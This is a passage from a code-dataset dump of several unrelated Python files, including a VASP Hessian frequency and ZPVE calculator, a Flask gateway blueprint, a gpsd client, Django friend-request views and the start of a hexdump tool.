')\n\t\t\t\tAtomMass[ModyAtomName]\n\t\t\texcept:\n\t\t\t\tCodeStatus('Atom type not recognized. Come again?', l=8)\n\t\t\t\tcontinue\n\t\t\t# Ask for new mass\n\t\t\ttry:\n\t\t\t\tModifyAtomMass = float(input(' '*12+'> New mass (g/mol) of atom : '))\n\t\t\texcept:\n\t\t\t\tCodeStatus('Mass not recognized. Sure it was a number?', l=8)\n\t\t\t\tcontinue\n\t\t\t# Modify registry (use the same '-Istp' suffix in both dictionaries so lookups stay consistent)\n\t\t\tAtomMass.pop(ModyAtomName)\n\t\t\tAtomMass[ModyAtomName+'-Istp'] = ModifyAtomMass\n\t\t\tfor k in Atom_index:\n\t\t\t\tif Atom_index[k][0] == ModyAtomName: Atom_index[k] = [ModyAtomName+'-Istp', ModifyAtomMass]\n\t\t\tCodeStatus('New dict. of masses : ' + str(AtomMass), l=12)\n\n\t\t# Modify by atom index\n\t\telif ModificationType == 'i':\n\t\t\t# Ask for atom index\n\t\t\ttry:\n\t\t\t\tModyAtomIndex = input(' '*12+'> Modify mass of atom (index, 1 to '+str(AtomCounter)+') : ')\n\t\t\t\tAtom_index[ModyAtomIndex]\n\t\t\texcept:\n\t\t\t\tCodeStatus('Atom index not recognized. Atoms in POSCAR are numbered from 1 to '+str(AtomCounter), l=8)\n\t\t\t\tcontinue\n\t\t\t# Ask for new mass\n\t\t\ttry:\n\t\t\t\tModifyAtomMass = float(input(' '*12+'> New mass (g/mol) of atom #'+ModyAtomIndex+' ('+Atom_index[ModyAtomIndex][0]+', '+str(Atom_index[ModyAtomIndex][1])+')'+' : '))\n\t\t\texcept:\n\t\t\t\tCodeStatus('Mass not recognized. Sure it was a number?', l=8)\n\t\t\t\tcontinue\n\t\t\t# Modify registry\n\t\t\tAtomMass[Atom_index[ModyAtomIndex][0]+'-Istp'] = ModifyAtomMass\n\t\t\tAtom_index[ModyAtomIndex] = [Atom_index[ModyAtomIndex][0]+'-Istp', ModifyAtomMass]\n\t\t\tCodeStatus('Added exception : Atom=' + str(Atom_index[ModyAtomIndex]), l=12)\n\n\t\t# Ask for review\n\t\tif input(' '*4+'> Review registry? (y/def=n) : ') == 'y':\n\t\t\tprint(' '*12+'Atom types and masses : '+str(AtomMass))\n\t\t\tprint(' '*12+'Atom index list : ')\n\t\t\tfor k in Atom_index:\n\t\t\t\tprint(' '*16+'Atom N='+str(k)+' , type '+Atom_index[k][0]+' , mass (g/mol) = '+str(Atom_index[k][1]))\n\n\telse:\n\t\tCodeStatus('Atom types and masses are set. Continuing ... 
')\n\t\tModifiying = False\n\n\n\n\n############################################################################################\n#### Created: \tAtomMass = {'Atom name' : Atom mass}\n####\t\t\tAtom_index = {'Atom index number' : ( 'Atom name', Atom mass)}\n############################################################################################\n\n\n\n\n\n\n################################################################################################################################\n################################################################################################################################\nprint(' '*6+'-'*60)\n################################################################################################################################\n################################################################################################################################\n\n############ Check Information in OUTCAR\n\ntry:\n\t# Getting OUTCAR\n\twith open('OUTCAR', 'r') as f:\n\t\tOutFile = f.readlines()\n\tCodeStatus('OUTCAR file found and read')\n\t# with open('POTCAR', 'r')\n\nexcept: quit('OUTCAR file not found')\n\n\n\nLineIter = iter(OutFile)\n# IBRION type\nwhile True:\n\ttry:\n\t\tiLine = next(LineIter)\n\t\tif 'IBRION' in iLine.split():\n\t\t\tif int(iLine.split()[2]) in [5,6,7]: CodeStatus('Calculation is of frequency type (IBRION='+iLine.split()[2]+')')\n\t\t\tbreak\n\n\texcept:\n\t\tquit(' '*8+'>>>> IBRION tag not found or incomplete, something is really wrong here')\n\n\n# DOF\nwhile True:\n\ttry:\n\t\tiLine = next(LineIter)\n\t\tif 'Degrees' in iLine.split():\n\t\t\tDOF = int(iLine.split()[5])\n\t\t\tCodeStatus('A total of '+str(DOF)+' degrees of freedom are considered')\n\t\t\tbreak\n\texcept:\n\t\tquit(' ' * 8 + '>>>> Degrees of freedom not found')\n\n\n\n\n\n\n# Second derivative matrix\nwhile True:\n\ttry:\n\t\tiLine=next(LineIter)\n\t\tif ' SECOND DERIVATIVES (NOT SYMMETRIZED)\\n' == iLine:\n\t\t\t# DOF list\n\t\t\tnext(LineIter)\n\t\t\tDOF_list = next(LineIter).split()\n\t\t\tCodeStatus('Degrees of freedom list retrieved : '+str(DOF_list)) # Debug\n\t\t\t# Hessian\n\t\t\tHess = []\n\t\t\tfor iRow in range(DOF):\n\t\t\t\tHess.append([-float(ele) for ele in next(LineIter).split()[1:]])\n\n\t\t\t# End recollection\n\t\t\tbreak\n\n\texcept:\n\t\tquit(' ' * 8 + '>>>> Something is wrong with your second derivatives matrix. It may be missing or incomplete, check it out.')\n\n# Report Hessian\nCodeStatus('Hessian matrix properly retrieved')\n\ndef ReportHessian():\n\tprint(' (decimals chopped only for visualization): \\n')\t\t\t\t\t\t\t\t\t\t\t# Debug\n\tprint(' ' * 18, end='')\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n\tfor iDOF in DOF_list: print(FixBlanck(Atom_index[iDOF[:-1]][0] + ':' + iDOF), end=' ')\t\t\t# Debug\n\tprint('')\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n\tfor iRow, iDOF in zip(Hess, DOF_list):\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n\t\tprint(' ' * 10, end=FixBlanck(Atom_index[iDOF[:-1]][0] + ':' + iDOF))\t\t\t\t\t\t# Debug\n\t\tfor iCol in iRow:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n\t\t\tprint(FixNumBlanck(iCol), end=' ')\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n\t\tprint('')\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n\tprint('')\n\n# ReportHessian()\t# Debug\n\n# Force symmetrization\nif not input(' '*4+'> Force symmetrization of Hessian by averaging (VASP default) ? 
(def=y/n) : ') == 'n':\n\t# upper triangle\n\tfor i in range(len(DOF_list)-1):\n\t\tfor j in range(1+i,len(DOF_list)):\n\t\t\t# print('Index:('+str(i)+','+str(j)+')'+str(Hess[i][j]))\n\t\t\tHess[i][j] = (Hess[i][j] + Hess[j][i]) / 2.\n\t\t\tHess[j][i] = Hess[i][j]\n\nelse:\n\tCodeStatus('Keeping original non-symmetrized Hessian matrix from VASP OUTPUT: ')\n\tReportHessian()\n\n\n####################################################################\n#### Created: \tHess = Hessian matrix of second derivatives\n####################################################################\n\n\n\n\n################################################################################################################################\n################################################################################################################################\nprint(' '*6+'-'*60)\n################################################################################################################################\n################################################################################################################################\n\n\n############ Recalculation of frequencies\n\neV2J = 1.602176634e-19\t# J/eV\nNav = 6.02214076e23\t\t# Part/mol\ncc = 299792458 \t\t\t# m/s\n\n\nMassHess = []\nfor iRow, iDOF in zip(Hess, DOF_list):\n\tMassHess_row = []\n\t# print(str(iDOF)+' = '+str(Atom_index[iDOF[:-1]])+' -> '+str(iRow)) # debug\n\tRowMass = Atom_index[iDOF[:-1]][1]\n\tfor iHess in iRow:\n\t\tMassHess_row.append(iHess/RowMass)\n\t# print('-'*20+'> ' + str(MassHess_row)) # debug\n\tMassHess.append(MassHess_row)\n\n\n\n\n# Report\nCodeStatus('Positive mass-weighted Hessian matrix constructed ')\n# print('(decimals chopped only for visualization): \\n'+' ' * 12) \t\t\t\t\t\t\t\t\t# Debug\n# for iDOF in DOF_list: print(FixBlanck(Atom_index[iDOF[:-1]][0] + ':' + iDOF, l=16), end=' ') \t# Debug\n# print('') \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n# for iRow, iDOF in zip(MassHess, DOF_list): \t\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n# \tprint(' ' * 4, end=FixBlanck(Atom_index[iDOF[:-1]][0] + ':' + iDOF))\t\t\t\t\t\t\t# Debug\n# \tfor iCol in iRow:\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n# \t\tprint(FixNumBlanck(iCol, l=16), end=' ')\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n# \tprint('')\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# Debug\n\n\n# Eigenvalues and Eigenvectors\nHessArray = np.array(MassHess)\neVal, eVect = np.linalg.eig(HessArray)\nCodeStatus('Eigenvalues and eigenvectors were calculated : \\n')\n\n# for iF in eVal: print(str(FixNumBlanck(iF, l=8, d=2)), end=' / ') # Debug\n# print() # Debug\n\n\n# Applying factors\neVal = [k * eV2J * Nav * 1e3 * 1e20 for k in eVal]\t# [1/s^2],\n\n# Linear frequencies [1/s = Hz]\nFqReal = []; FqImg=[]\nfor iVal in eVal:\n\tif iVal <0: FqImg.append(\t((-iVal)**.5)\t/(2*np.pi))\n\telse: \t\tFqReal.append(\t((iVal)**.5)\t/(2*np.pi))\n\n# Order frequencies\nFqReal.sort(reverse=True)\nFqImg.sort(reverse=True)\n\n# Spectral frequencies [cm-1]\nFqRealcm = []; FqImgcm=[]\nfor iFq in FqReal: FqRealcm.append(\tiFq/(100*cc))\nfor iFq in FqImg: FqImgcm.append(\tiFq/(100*cc))\n\n# Report\ndef ReportFreqList(iFreqList, **kwargs):\n\tfor iFq in iFreqList: print(FixNumBlanck(iFq, l=kwargs.get('l',9), d=kwargs.get('g',2)), end='')\n\n\nprint(' '*8, end='Real freqs (THz) : ')\nReportFreqList([k*1e-12 for k in FqReal]) # THz\nprint('\\n'+' '*8, end='          (cm-1) : ')\nReportFreqList(FqRealcm) # cm-1\n\nprint('\\n\\n'+' '*8, end='Imaginary freqs (THz) : ')\nif len(FqImg) == 0: 
print('None found')\nelse:\n\tReportFreqList([k*1e-12 for k in FqImg]) # THz\n\tprint('\\n' + ' ' * 8, end='          (cm-1) : ')\n\tReportFreqList(FqImgcm) # cm-1\nprint('\\n')\n\n\n\n################################################################################################################################\n################################################################################################################################\nprint(' '*6+'-'*60)\n################################################################################################################################\n################################################################################################################################\n\n\n\n############################### ZPVE calculation\nhh\t\t\t= 6.62606957E-34\ncc\t\t\t= 299792458\neV2J\t\t= 1.602176634E-19\ndef fZPVEi(iFreq):\n\treturn (iFreq * hh * cc * 100) / (2 * eV2J)\t\t\t# /(eV)\n\n# Individual real contributions\nFqRealeV = []\nfor iFq in FqRealcm: FqRealeV.append(fZPVEi(iFq))\n\n# Cut Off\ntry:\n\tCutOff = float(input(' '*2+'> CutOff for ZPVE (def=100cm-1) = '))\nexcept:\n\tCodeStatus('What\'s that? Using default value = 100 cm-1')\n\tCutOff = 100\n\n# ZPVE sum\nZPVE = 0\nfor iFq in FqRealcm:\n\tif iFq > CutOff: ZPVE+=fZPVEi(iFq)\n\n# Report\nprint()\nSepare = True\nCodeStatus('ZPVE contributions (eV) : ', end='')\nfor iF in FqRealcm:\n\tif Separe and iF < CutOff:\n\t\tprint(' \\n'+' '*9+'real but not in ZPVE : ', end='')\n\t\tSepare = False\n\tprint(FixNumBlanck(fZPVEi(iF), l=4, d=4), end=' ' * 3) # eV\nprint('')\n\nCodeStatus('Accumulated ZPVE (eV) : '+str(FixNumBlanck(ZPVE, l=0))+' eV\\n')\n\n","repo_name":"sebagodoy/VASP_tools","sub_path":"VASP.vibrations.py","file_name":"VASP.vibrations.py","file_ext":"py","file_size_in_byte":15462,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"18500637929","text":"from flask import request, Blueprint\nimport requests\n\nfrom utils import load_file_config, HEADERS\n\nmesa_blueprints = Blueprint(\"mesa_blueprint\", __name__)\ndata_config = load_file_config()\nurl_base = data_config.get('url-backend-registraduria') + \"/mesa\"\n\n\n@mesa_blueprints.route(\"/mesas\", methods=['GET'])\ndef get_all_mesas() -> dict:\n    url = f'{url_base}/all'\n    response = requests.get(url, headers=HEADERS)\n    return response.json()\n\n\n@mesa_blueprints.route(\"/mesa/<string:id_>\", methods=['GET'])\ndef get_mesa_by_id(id_: str) -> dict:\n    url = f'{url_base}/{id_}'\n    response = requests.get(url, headers=HEADERS)\n    return response.json()\n\n\n@mesa_blueprints.route(\"/mesa/insert\", methods=['POST'])\ndef insert_mesa() -> dict:\n    mesa = request.get_json()\n    url = f'{url_base}/insert'\n    response = requests.post(url, headers=HEADERS, json=mesa)\n    return response.json()\n\n\n@mesa_blueprints.route(\"/mesa/update/<string:id_>\", methods=['PUT'])\ndef update_mesa(id_: str) -> dict:\n    mesa = request.get_json()\n    url = f'{url_base}/update/{id_}'\n    response = requests.patch(url, headers=HEADERS, json=mesa)\n    return response.json()\n\n\n@mesa_blueprints.route(\"/mesa/delete/<string:id_>\", methods=['DELETE'])\ndef delete_mesa(id_: str) -> dict:\n    url = f'{url_base}/delete/{id_}'\n    response = requests.delete(url, headers=HEADERS)\n    return {\"message\": \"processed\"}, 
response.status_code\n","repo_name":"eyamayai/apiGateway_c17g4","sub_path":"registraduria_backend/mesa_blueprints.py","file_name":"mesa_blueprints.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30649076110","text":"class Analyzer:\n def __init__(self, fds, keys, relation, candidateKeys, subs):\n self.fds = fds\n self.primary = keys\n self.relation = relation\n self.candiKeys = candidateKeys\n self.subset = subs\n self.fdClosure = []\n for each in fds:\n self.fdClosure.append(each)\n\n def checkOneNF(self):\n return self.fds\n\n def checkTwoNF(self):\n return 'asd'\n\n def checkThreeNF(self):\n return 'asd'\n\n # Armstrong's Axiom of reflectivity\n def reflexitivity(self):\n for rel in self.relation:\n self.fdClosure.append(\n [[rel], [rel]]\n )\n for sset in self.subset:\n for sub in sset[1]:\n self.fdClosure.append([sset[0],[sub]])\n return self.fdClosure\n\n # Armstrong's Axiom of Augmentation\n # def augmentation(self):\n # for att in self.relation:\n # for one in self.fdClosure:\n # print(one, \"**\")\n\n def removeDup(self):\n return self.fdClosure\n\n def getLHS(self, lst):\n lhsList = []\n for item in lst:\n lhsList.append(item[0])\n return lhsList\n\n def getRHS(self, lst):\n rhsList = []\n for item in lst:\n rhsList.append(item[1])\n return rhsList\n\n\ncandidateKeys = ['A', 'C']\n\nR = ['A', 'B', 'C', 'D', 'E', 'F']\n\nfuncdeps = [\n [['A'], ['B']],\n [['C'], ['D']],\n]\n\nsubset = [[['A'], ['D', 'E']]]\n\n# experiments\ntest = Analyzer(funcdeps, '', R, candidateKeys, subset)\n\ntest.reflexitivity()\n# print(i[0], '->', i[1])\n\n# experiments.augmentation()\n\nfor a in test.removeDup():\n print(a)\n# for a in experiments.getLHS():\n# for b in experiments.getRHS():\n# print(a, '->', b)\n","repo_name":"amilacjay/isyntax","sub_path":"dbnormalizer/experiments/schemaAnalyzer.py","file_name":"schemaAnalyzer.py","file_ext":"py","file_size_in_byte":1754,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"37204552250","text":"import json\ninput = open('day13/input13.txt').read().strip().replace('\\n\\n','\\n').split('\\n')\ninput.append('[[2]]')\ninput.append('[[6]]')\ninput = [json.loads(x) for x in input]\n\ndef compare(left,right):\n res = None\n lengths = [len(left),len(right)]\n for i in range(max(lengths)):\n if i == lengths[0]:\n return 1\n if i == lengths[1]:\n return 0\n if type(left[i]) == type(right[i]) and type(left[i])==int:\n if left[i] < right[i]:\n return 1\n if left[i] > right[i]:\n return 0\n if type(left[i]) == type(right[i]) and type(left[i])==list:\n res = compare(left[i],right[i])\n if type(left[i]) == int and type(right[i]) == list:\n res = compare([left[i]],right[i])\n if type(left[i]) == list and type(right[i]) == int:\n res = compare((left[i]),[right[i]])\n if res != None:\n return res\n\ndef bubblesort(unsortedList):\n n = len(unsortedList)\n swapped = False\n for i in range(n-1):\n if compare(unsortedList[i],unsortedList[i+1]) != 1:\n swapped = True\n unsortedList[i], unsortedList[i+1] = unsortedList[i+1], unsortedList[i]\n return swapped\n\nres = True\nwhile res == True:\n res = bubblesort(input)\n\nprint('the product of the indices =', 
(input.index([[2]])+1)*(input.index([[6]])+1))","repo_name":"categoraal/adventofcode2022","sub_path":"day13/day13q2.py","file_name":"day13q2.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38782374496","text":"from __future__ import absolute_import\nfrom __future__ import print_function\n\nimport logging\nimport socket\nimport threading\nimport time\n\nimport gps\n\nfrom followme.geom import Point3D\nfrom followme.observable import Observable\nfrom followme.tools import AveragePosition\n\nLOG = logging.getLogger(__name__)\n\n\n# A placeholder value used before we receive any fix information\n# from gpsd.\nclass _NoFix (object):\n mode = 0\n\nNoFix = _NoFix()\n\n\nclass GPS(Observable, threading.Thread):\n def __init__(self, average_points=5, min_sats=5):\n super(GPS, self).__init__()\n self.setDaemon(True)\n self.lock = threading.Lock()\n\n self.min_sats = min_sats\n self._fix = NoFix\n self._lastfix = NoFix\n self._lastgood = None\n self._avg = AveragePosition(average_points)\n self._quit = False\n self._nsats_visible = 0\n self._nsats_used = 0\n\n def _set_fix(self, fix):\n with self.lock:\n self._lastfix = self.fix\n self._fix = fix\n\n if fix.mode == gps.MODE_3D:\n self._lastgood = fix\n self._avg.append(fix.lat, fix.lon, fix.alt)\n\n if self._lastfix.mode != self._fix.mode:\n self.notify_observers(self._lastfix, self._fix)\n\n def _set_nsats(self, sky):\n sats = sky.get('satellites', [])\n self._nsats_visible = len(sats)\n self._nsats_used = len([x for x in sats if x['used']])\n LOG.debug('sats visible=%d, used=%d, min=%d',\n self._nsats_visible,\n self._nsats_used,\n self.min_sats)\n\n def _run(self):\n self.gps = gps.gps()\n self.gps.stream(gps.WATCH_ENABLE | gps.WATCH_NEWSTYLE)\n\n for report in self.gps:\n if self._quit:\n break\n\n if report.get('class') == 'TPV':\n self._set_fix(report)\n elif report.get('class') == 'SKY':\n self._set_nsats(report)\n\n def run(self):\n while True:\n try:\n self._run()\n except socket.error:\n LOG.error('failed to connect gpsd')\n time.sleep(1)\n continue\n finally:\n self._set_fix(NoFix)\n\n def cancel(self):\n self._quit = True\n\n @property\n def fix(self):\n return self._fix\n\n @property\n def has_fix(self):\n return (\n self._fix.mode == gps.MODE_3D and\n self._nsats_used > self.min_sats\n )\n\n @property\n def pos(self):\n return self._avg.value\n\n @property\n def raw(self):\n fix = self._lastgood\n if not fix:\n return None\n\n return Point3D(fix.lat, fix.lon, fix.alt)\n","repo_name":"larsks/followme","sub_path":"followme/gpsclient.py","file_name":"gpsclient.py","file_ext":"py","file_size_in_byte":2738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74729714433","text":"from imageai.Detection import ObjectDetection\n\ndetector = ObjectDetection()\n\nmodel_path = \"./imageAI/yolo-tiny.h5\"\ninput_path = \"./vid24TestImages/frame0.png\"\noutput_path = \"./newimage.jpg\"\n\ndetector.setModelTypeAsTinyYOLOv3()\ndetector.setModelPath(model_path)\ndetector.loadModel()\ndetection = detector.detectObjectsFromImage(input_image=input_path, output_image_path=output_path)\n\nfor eachItem in detection:\n print(eachItem[\"name\"] , \" : \", 
eachItem[\"percentage_probability\"])","repo_name":"Kunal2341/angledImageTransformation","sub_path":"EVERYTHINGELSE/otherCode/detectPersonTests-NotWorking/imageAItest.py","file_name":"imageAItest.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17906131916","text":"#!/usr/bin/env python\n\"\"\"\nPrecompute lensing pairs using UniverseMachine SMDPL catalog.\n\"\"\"\n\nimport os\nimport argparse\n\nimport numpy as np\n\nfrom astropy.table import Table\n\nfrom asap import vagc\n\n\ndef main(um_file, ptl_file, wl_min_r=0.08, wl_max_r=50.0, wl_n_bins=22, verbose=True):\n \"\"\"Pre-compute the particles pairs to calculate WL profile.\"\"\"\n # Read in the UM mock catalog\n um_mock = Table(np.load(um_file))\n if verbose:\n print(\"# Load in UM mock catalog: {}\".format(um_file))\n print(\"# Dealing with {} galaxies\".format(len(um_mock)))\n # Read in the particle table\n sim_particles = Table(np.load(ptl_file))\n if verbose:\n print(\"# Load in particle table: {}\".format(ptl_file))\n print(\"# Dealing with {} particles\".format(len(sim_particles)))\n\n # Output file name\n um_pre, _ = os.path.splitext(um_file)\n ptl_pre, _ = os.path.splitext(ptl_file)\n n_ptl = ptl_pre.split('_')[-1]\n precompute_out = \"{}_{}_r_{:4.2f}_{:4.1f}_{:2d}bins.npy\".format(\n um_pre, n_ptl, wl_min_r, wl_max_r, wl_n_bins\n )\n if verbose:\n print(\"# Output file name : {}\".format(precompute_out))\n\n # Run precompute\n if 'smdpl' in ptl_file:\n mass_encl = vagc.precompute_wl_smdpl(\n um_mock, sim_particles, wl_min_r=wl_min_r, wl_max_r=wl_max_r,\n wl_n_bins=wl_n_bins)\n elif 'mdpl2' in ptl_file:\n mass_encl = vagc.precompute_wl_mdpl2(\n um_mock, sim_particles, wl_min_r=wl_min_r, wl_max_r=wl_max_r,\n wl_n_bins=wl_n_bins)\n else:\n raise NameError(\"# Wrong simulation: [smdpl/mdpl2]\")\n\n np.save(precompute_out, mass_encl)\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\n 'um_file', type=str,\n help=('UniverseMachine snapshot file in .npy format'))\n\n parser.add_argument(\n 'ptl_file', type=str,\n help=('Simulation particle table in .npy format'))\n\n parser.add_argument(\n '-l', '--r_low', dest='wl_min_r',\n help='Lower limit of the radial bin',\n type=float, default=0.08)\n\n parser.add_argument(\n '-u', '--r_upp', dest='wl_max_r',\n help='Upper limit of the radial bin',\n type=float, default=50.0)\n\n parser.add_argument(\n '-n', '--n_bins', dest='wl_n_bins',\n help='Number of the radial bin',\n type=int, default=22)\n\n args = parser.parse_args()\n\n main(args.um_file, args.ptl_file,\n wl_min_r=args.wl_min_r, wl_max_r=args.wl_max_r,\n wl_n_bins=args.wl_n_bins)\n","repo_name":"dr-guangtou/asap","sub_path":"asap/scripts/um_precompute_pairs.py","file_name":"um_precompute_pairs.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"25268008117","text":"from django.db import IntegrityError\nfrom django.shortcuts import get_object_or_404\nfrom djoser.views import UserViewSet as DjoserUserViewSet\nfrom rest_framework import status, viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.mixins import ListModelMixin\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom api.models import User, FriendRequest\nfrom api.serializers import UserSerializer, FriendRequestSerializer, 
FriendRequestToSerializer, \\\n    FriendRequestBySerializer\n\n\nclass UserViewSet(DjoserUserViewSet):\n    \"\"\"Viewset for users.\"\"\"\n\n    @action(\n        permission_classes=[IsAuthenticated],\n        methods=['post'],\n        detail=True\n    )\n    def add_friend(self, request, id):\n        \"\"\"Method for adding a friend.\"\"\"\n        user = request.user\n        friend = get_object_or_404(User, id=id)\n\n        if user == friend:\n            return Response(\n                {'error': 'You cannot add yourself as a friend'},\n                status=status.HTTP_400_BAD_REQUEST\n            )\n        if friend in user.friends.all():\n            return Response(\n                {'error': 'This user is already your friend'},\n                status=status.HTTP_400_BAD_REQUEST\n            )\n        # Check whether this user has already sent us a friend request\n        if FriendRequest.objects.filter(\n            requested_by=friend,\n            requested_to=user\n        ).exists():\n            friend_request = FriendRequest.objects.get(\n                requested_by=friend,\n                requested_to=user\n            )\n            friend_request.delete()\n            user.friends.add(friend)\n            serializer = UserSerializer(\n                friend, context={'request': request}\n            )\n            return Response(\n                serializer.data, status=status.HTTP_201_CREATED\n            )\n        try:\n            friend_request = FriendRequest.objects.create(\n                requested_by=user,\n                requested_to=friend\n            )\n            serializer = FriendRequestSerializer(\n                friend_request, context={'request': request}\n            )\n            return Response(serializer.data, status=status.HTTP_201_CREATED)\n        except Exception as e:\n            return Response(\n                {'error': 'Failed to send the friend request', 'err_msg': str(e)},\n                status=status.HTTP_400_BAD_REQUEST\n            )\n\n    @action(\n        permission_classes=[IsAuthenticated],\n        methods=['delete'],\n        detail=True\n    )\n    def delete_friend(self, request, id):\n        \"\"\"Method for removing a friend.\"\"\"\n        user = request.user\n        friend = get_object_or_404(User, id=id)\n\n        if friend not in user.friends.all():\n            return Response(\n                {'error': 'This user is not your friend'},\n                status=status.HTTP_400_BAD_REQUEST\n            )\n        # ManyRelatedManager.remove() returns None, so it cannot be used as a success condition\n        user.friends.remove(friend)\n        return Response(status=status.HTTP_204_NO_CONTENT)\n\n    @action(\n        permission_classes=[IsAuthenticated],\n        methods=['get'],\n        detail=False\n    )\n    def friends(self, request):\n        \"\"\"Method for viewing the friend list.\"\"\"\n        user = request.user\n        friends = user.friends.all()\n        serializer = UserSerializer(friends, many=True, context={'request': request})\n        return Response(serializer.data)\n\n\nclass OutgoingRequestViewSet(ListModelMixin, viewsets.GenericViewSet):\n    \"\"\"Viewset for listing outgoing friend requests.\"\"\"\n    permission_classes = [IsAuthenticated]\n    serializer_class = FriendRequestBySerializer\n\n    def get_queryset(self):\n        user = self.request.user\n        return FriendRequest.objects.filter(requested_by=user).all()\n\n\nclass IncomingRequestViewSet(ListModelMixin, viewsets.GenericViewSet):\n    \"\"\"Viewset for listing incoming friend requests.\"\"\"\n    http_method_names = ['get', 'post']\n    permission_classes = [IsAuthenticated]\n    serializer_class = FriendRequestToSerializer\n\n    def get_queryset(self):\n        user = self.request.user\n        return FriendRequest.objects.filter(requested_to=user)\n\n    @action(\n        permission_classes=[IsAuthenticated],\n        methods=['post'],\n        detail=True\n    )\n    def accept(self, request, pk):\n        \"\"\"Method for accepting a friend request.\"\"\"\n        user = request.user\n        friend_request = get_object_or_404(FriendRequest, id=pk)\n        friend = get_object_or_404(User, id=friend_request.requested_by.id)\n        try:\n            user.friends.add(friend)\n            serializer = UserSerializer(\n                friend, 
context={'request': request}\n            )\n            friend_request.delete()\n            return Response(serializer.data, status=status.HTTP_201_CREATED)\n        except Exception as e:  # IntegrityError is a subclass of Exception, so this covers both\n            return Response(\n                {'error': 'Failed to add friend', 'err_msg': str(e)},\n                status=status.HTTP_400_BAD_REQUEST\n            )\n\n    @action(\n        permission_classes=[IsAuthenticated],\n        methods=['post'],\n        detail=True\n    )\n    def decline(self, request, pk):\n        \"\"\"Method for declining a friend request.\"\"\"\n        friend_request = get_object_or_404(FriendRequest, id=pk)\n        if friend_request.delete():\n            return Response(status=status.HTTP_204_NO_CONTENT)\n        return Response(\n            {'error': 'Failed to decline the request'},\n            status=status.HTTP_400_BAD_REQUEST\n        )\n","repo_name":"lzrdou/vk_internship_test","sub_path":"api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31586105326","text":"import os\nimport time\n\nfrom datetime import datetime\n\nfrom hash_calc.HashCalc import HashCalc\n\nclass Controller():\n    def __init__(self, path, hashingAllowed) -> None:\n        self.startTime = time.time()\n        self.md5 = \"-\"\n        self.sha256 = \"-\"\n        self.path = path\n        if(hashingAllowed):\n            h = HashCalc(path)\n            self.md5 = h.md5\n            self.sha256 = h.sha256\n\n    def printHeader(self):\n        print(\"######################################################################################################################\")\n        print(\"\")\n        print(\"Hexdump by 5f0\")\n        print(\"Prints the hexdump of a selected file\")\n        print(\"\")\n        print(\"Current working directory: \" + os.getcwd())\n        print(\"        Investigated file: \" + self.path)\n        print(\"\")\n        print(\"                 MD5 Hash: \" + self.md5)\n        print(\"              SHA256 Hash: \" + self.sha256)\n        print(\"\")\n        print(\"                 Datetime: \" + datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\"))\n        print(\"\")\n        print(\"######################################################################################################################\")\n        print(\"\")\n\n\n    def writeFileHeader(self, outfile, path, isOffset=False, offset = 0, noOfBytes = 0):\n        with open(outfile, \"w\") as f:\n            f.write(\"         Datetime: \" + datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\") + \"\\n\")\n            f.write(\"\\n\")\n            f.write(\"Investigated File: \" + path + \"\\n\")\n            f.write(\"         MD5 Hash: \" + self.md5 + \"\\n\")\n            f.write(\"      SHA256 Hash: \" + self.sha256 + \"\\n\")\n            f.write(\"\\n\")\n\n            if(isOffset):\n                e = open(path,\"rb\")\n                e.seek(offset, 0)\n                b = e.read(noOfBytes)\n                e.close()\n                h = HashCalc.fromBytes(b)\n                f.write(\"           Offset: \" + str(offset) + \"\\n\")\n                f.write(\"     No. 
